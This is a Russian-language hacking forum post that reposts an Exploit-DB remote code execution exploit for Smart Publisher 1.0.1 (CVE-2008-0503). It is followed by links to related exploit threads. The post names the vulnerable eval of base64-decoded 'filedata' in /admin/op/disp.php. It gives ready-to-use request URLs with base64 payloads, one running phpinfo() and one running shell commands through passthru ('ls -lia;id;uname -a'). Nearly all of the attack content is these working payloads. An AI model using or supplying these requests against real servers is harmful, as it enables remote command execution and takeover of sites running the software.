Exploit Smart Publisher 1.0.1 - 'filedata' Remote Code Execution

Exploiter

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
5003
Проверка EDB
  1. Пройдено
Автор
GOLD_M
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2008-0503
Дата публикации
2008-01-29
Код: 
              ######    ######                 ##############               ######  ######                      ########          ##    
                ####      ##                   ##    ##    ##                 ##      ##                      ##      ##                
  ########      ##  ##    ##      ########           ##       ####  ######      ##  ##        ########      ##                ######    
##        ##    ##  ##    ##    ##        ##         ##         ####            ##  ##      ##        ##    ##                    ##    
  ##########    ##    ##  ##      ##########         ##         ##                ##          ##########    ##      ######        ##    
##        ##    ##    ##  ##    ##        ##         ##         ##                ##        ##        ##    ##        ##          ##    
##        ##    ##      ####    ##        ##  ###    ##         ##                ##        ##        ##      ##      ##          ##    
  #########   ######    ####      #########   ###  ######     ##########        ######        ##########        ######        ##########

                            ######################################################################
                            ### Smart Publisher 1.0.1 (disp.php) Remote Code Execution Exploit ###
                            ### Script : http://sourceforge.net/projects/smart-publisher/      ###
                            ### Vuln Code In '/admin/op/disp.php'In Line '3'                   ###
                            ### eval("\$v=".base64_decode($filedata).";"); <- Vuln             ###
                            ### POC :                                                          ###
                            ### /admin/op/disp.php?filedata=cGhwaW5mbygp <= phpinfo() Base64   ###
                            ### ?filedata=cGFzc3RoZXUobHMgLWxpYTtpZDt1bmFtZSAtYSk <= passtheu(ls -lia;id;uname -a)
                            ######################################################################

# milw0rm.com [2008-01-29]
 
Источник
www.exploit-db.com
Войдите или зарегистрируйтесь для ответа.

Похожие темы

Exploiter
Exploit Joomla! Component Smart Shoutbox 3.0.0 - SQL Injection
Ответы
0
Просмотры
902
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit WordPress Plugin Smart Google Code Inserter < 3.5 - Authentication Bypass / SQL Injection
Ответы
0
Просмотры
702
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit HP Smart Storage Administrator 2.30.6.0 - Remote Command Injection (Metasploit)
Ответы
0
Просмотры
669
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Foreman Smart-Proxy - Remote Command Injection
Ответы
0
Просмотры
555
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Softmatica SMART iPBX - Multiple SQL Injections
Ответы
0
Просмотры
530
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit WordPress Plugin Smart Flv - 'jwplayer.swf' Multiple Cross-Site Scripting Vulnerabilities
Ответы
0
Просмотры
478
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Smart Magician Blog 1.0 - Multiple SQL Injections
Ответы
0
Просмотры
490
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Smart ASP Survey - 'catid' SQL Injection
Ответы
0
Просмотры
555
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Go Smart Inc GoSmart Message Board - Multiple Input Validation Vulnerabilities
Ответы
0
Просмотры
483
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Smart PHP Poll - Authentication Bypass
Ответы
0
Просмотры
435
Эксплойты & Уязвимости
Exploiter
Exploiter
Сверху Снизу